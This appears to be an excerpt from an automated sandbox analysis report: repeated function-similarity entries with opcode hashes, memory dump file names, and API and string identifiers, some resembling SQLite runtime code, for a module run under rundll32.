                                                                                                                                                        • Instruction ID: 3f406fad551c40365cc5cb1540711d55f1becdba0e35e7baf61e3cec5a7510a6
                                                                                                                                                        • Opcode Fuzzy Hash: 9d0d7fe0f9281b38b46733d1c3bd952b65e444312dfa331b10d2a2bca2ac9700
                                                                                                                                                        • Instruction Fuzzy Hash: A581A033F0868286EB149F25E4A5AB96790FB85B84F059231DB7E87BC9DF3CE4118740
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: b5dbd288d49a495213672b2650cd87f2f45c00111ba0c5e79e6033a279b9f760
                                                                                                                                                        • Instruction ID: 34bbd52ad5b1ed9cd66c2b744fa257caf28644310ab8c0d40b1bd7a215dce1cb
                                                                                                                                                        • Opcode Fuzzy Hash: b5dbd288d49a495213672b2650cd87f2f45c00111ba0c5e79e6033a279b9f760
                                                                                                                                                        • Instruction Fuzzy Hash: 0F917222B1968587DB58CF2D911477C77A1F798B44F58A238DB6AC3B95EB38E580CB00
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 0f212ade3e8958b2948aab9627d8d3f87b9a032a6560960e39fd9d3d6f24f1df
                                                                                                                                                        • Instruction ID: 4f91b6a5ceef7594078e6dc59b37559790fb29ff51fd6e0b34b0da78f41402a3
                                                                                                                                                        • Opcode Fuzzy Hash: 0f212ade3e8958b2948aab9627d8d3f87b9a032a6560960e39fd9d3d6f24f1df
                                                                                                                                                        • Instruction Fuzzy Hash: 9C81B073F09682C5EB648A2AD160B7A67A1FB88BC4F149235DF6D47798DF38D841C740
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: a682c89c4171d09d1b423dacc8a77b168c7826289cd28c11594ecee54c45f6e9
                                                                                                                                                        • Instruction ID: 79d68e43a24f63fe6bfccdb53f6a0a46560c718c25a90a34945cf7aa57f32369
                                                                                                                                                        • Opcode Fuzzy Hash: a682c89c4171d09d1b423dacc8a77b168c7826289cd28c11594ecee54c45f6e9
                                                                                                                                                        • Instruction Fuzzy Hash: F591AE67F08B8582E714CB29951027D73A1FBA8B48F159225DFAD8379AEF38F5818340
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 6569a928983bfe19003c39f7ff2eb48886ed0f2940868716b29ec894a7c8a1ff
                                                                                                                                                        • Instruction ID: 68b4b076ed45d9a975a79936dc41de8f3bc4a6393845b7836145744a5038d7d1
                                                                                                                                                        • Opcode Fuzzy Hash: 6569a928983bfe19003c39f7ff2eb48886ed0f2940868716b29ec894a7c8a1ff
                                                                                                                                                        • Instruction Fuzzy Hash: 3B61F272B1866186D7208F19D050A7E77A0F788B89F049632EEAED7788DF3DE541CB40
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 16ceb259e3493bf1ec588c8a0c623d746afe974d10b1d82e5808d70a243b2649
                                                                                                                                                        • Instruction ID: 3ac27c4d6f39daf44a13f878a55d74ba5c9dec1cb88b66f62fa13690bae45259
                                                                                                                                                        • Opcode Fuzzy Hash: 16ceb259e3493bf1ec588c8a0c623d746afe974d10b1d82e5808d70a243b2649
                                                                                                                                                        • Instruction Fuzzy Hash: FB511813B1D3C98ADB50CB5D8410BBC7BA1E765B44F588235EAA8933D6CB3DD906C312
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: new[]
                                                                                                                                                        • String ID: %s%c%s$:$:$?$\$winFullPathname1$winFullPathname2
                                                                                                                                                        • API String ID: 4059295235-3840279414
                                                                                                                                                        • Opcode ID: f0c7fbf26231b777f2ec226560e043e4bcc77db31dc08ef99890e610614a0e83
                                                                                                                                                        • Instruction ID: df9e4f109352ca8cb02be4a2cf79eed1a111944fd5f389f6c6eeb1ad281aef4d
                                                                                                                                                        • Opcode Fuzzy Hash: f0c7fbf26231b777f2ec226560e043e4bcc77db31dc08ef99890e610614a0e83
                                                                                                                                                        • Instruction Fuzzy Hash: EF51AC21B0C28A45FB25DB22A471E7A6791EF44B88F084236DA7DC77DADF2CE5469300
                                                                                                                                                        APIs
                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000000,00007FFDFF2A9ED1,?,?,?,?,00007FFDFF2A4CC7), ref: 00007FFDFF2AB5CB
                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,00000000,00007FFDFF2A9ED1,?,?,?,?,00007FFDFF2A4CC7), ref: 00007FFDFF2AB601
                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,00000000,00007FFDFF2A9ED1,?,?,?,?,00007FFDFF2A4CC7), ref: 00007FFDFF2AB62E
                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,00000000,00007FFDFF2A9ED1,?,?,?,?,00007FFDFF2A4CC7), ref: 00007FFDFF2AB63F
                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,00000000,00007FFDFF2A9ED1,?,?,?,?,00007FFDFF2A4CC7), ref: 00007FFDFF2AB650
                                                                                                                                                        • SetLastError.KERNEL32(?,?,00000000,00007FFDFF2A9ED1,?,?,?,?,00007FFDFF2A4CC7), ref: 00007FFDFF2AB66B
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2506987500-0
                                                                                                                                                        • Opcode ID: c2988470996c8379b0b8b9b622bd793b46203877286ea0b4af43dca60023248b
                                                                                                                                                        • Instruction ID: 44d02dad5996438b216406ff3cada16274e79f3c9ce73c416e5f022458a46379
                                                                                                                                                        • Opcode Fuzzy Hash: c2988470996c8379b0b8b9b622bd793b46203877286ea0b4af43dca60023248b
                                                                                                                                                        • Instruction Fuzzy Hash: 5E113B22F0824252FB58A73255B593D67929F48BA4F044735E93ECE6EEDE2CA841C200
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _set_statfp
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1156100317-0
                                                                                                                                                        • Opcode ID: b279a170408d618237bddf6b9ec99c878b24dd9d163caff4e822d6b1485b2f82
                                                                                                                                                        • Instruction ID: fe540fa46f4be5a78778ad0916b69308ced4609b21f47fd424b9e542c6d9a6de
                                                                                                                                                        • Opcode Fuzzy Hash: b279a170408d618237bddf6b9ec99c878b24dd9d163caff4e822d6b1485b2f82
                                                                                                                                                        • Instruction Fuzzy Hash: B3119EE3F1DA0365F7941168E972BF953406F59370E080B34EA7ECE6DE9E2CA841420C
                                                                                                                                                        APIs
                                                                                                                                                        • FlsGetValue.KERNEL32(?,?,?,00007FFDFF2A9A4F,?,?,00000000,00007FFDFF2A9CEA,?,?,?,?,00000000,00007FFDFF2A9C76), ref: 00007FFDFF2AB6A3
                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFDFF2A9A4F,?,?,00000000,00007FFDFF2A9CEA,?,?,?,?,00000000,00007FFDFF2A9C76), ref: 00007FFDFF2AB6C2
                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFDFF2A9A4F,?,?,00000000,00007FFDFF2A9CEA,?,?,?,?,00000000,00007FFDFF2A9C76), ref: 00007FFDFF2AB6EA
                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFDFF2A9A4F,?,?,00000000,00007FFDFF2A9CEA,?,?,?,?,00000000,00007FFDFF2A9C76), ref: 00007FFDFF2AB6FB
                                                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FFDFF2A9A4F,?,?,00000000,00007FFDFF2A9CEA,?,?,?,?,00000000,00007FFDFF2A9C76), ref: 00007FFDFF2AB70C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Value
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3702945584-0
                                                                                                                                                        • Opcode ID: 1fa3851199622a7c069eb38baa46772d1902b3df2f6502d9db3f6eee4f8e80ff
                                                                                                                                                        • Instruction ID: 4dc805f9609f64cdc77287842d3de3d9c8c41f1d7d9c9b56eb0d28c5234e73de
                                                                                                                                                        • Opcode Fuzzy Hash: 1fa3851199622a7c069eb38baa46772d1902b3df2f6502d9db3f6eee4f8e80ff
                                                                                                                                                        • Instruction Fuzzy Hash: DA115C22F0824262FB58973669B193D67819F44BA0F145735E97DDE6FEDE2CE801C600
                                                                                                                                                        APIs
                                                                                                                                                        • RaiseException.KERNEL32(?,?,?,00000004,?,?,?,00007FFDFF26F51E), ref: 00007FFDFF2878FA
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000000E.00000002.2578163332.00007FFDFF151000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF150000, based on PE: true
                                                                                                                                                        • Associated: 0000000E.00000002.2578126116.00007FFDFF150000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578287943.00007FFDFF2B4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578336354.00007FFDFF2ED000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578369049.00007FFDFF2F2000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578399905.00007FFDFF2F3000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        • Associated: 0000000E.00000002.2578436819.00007FFDFF2F6000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_14_2_7ffdff150000_rundll32.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExceptionRaise
                                                                                                                                                        • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$database corruption
                                                                                                                                                        • API String ID: 3997070919-4001610065
                                                                                                                                                        • Opcode ID: b2a52ec6a9acb2f0d2f7fc7e27b479c82cbb8b08d5751bdb73389503be3c466e
                                                                                                                                                        • Instruction ID: 44c16b71f84715cb9c4fc8087be552e60442ce9aa1710af8f2ca60eb419dd18f
                                                                                                                                                        • Opcode Fuzzy Hash: b2a52ec6a9acb2f0d2f7fc7e27b479c82cbb8b08d5751bdb73389503be3c466e
                                                                                                                                                        • Instruction Fuzzy Hash: 1A61B232B08A8686E7608F15E460B7E73A1FB84784F148636DAADD7798DF3CE455CB00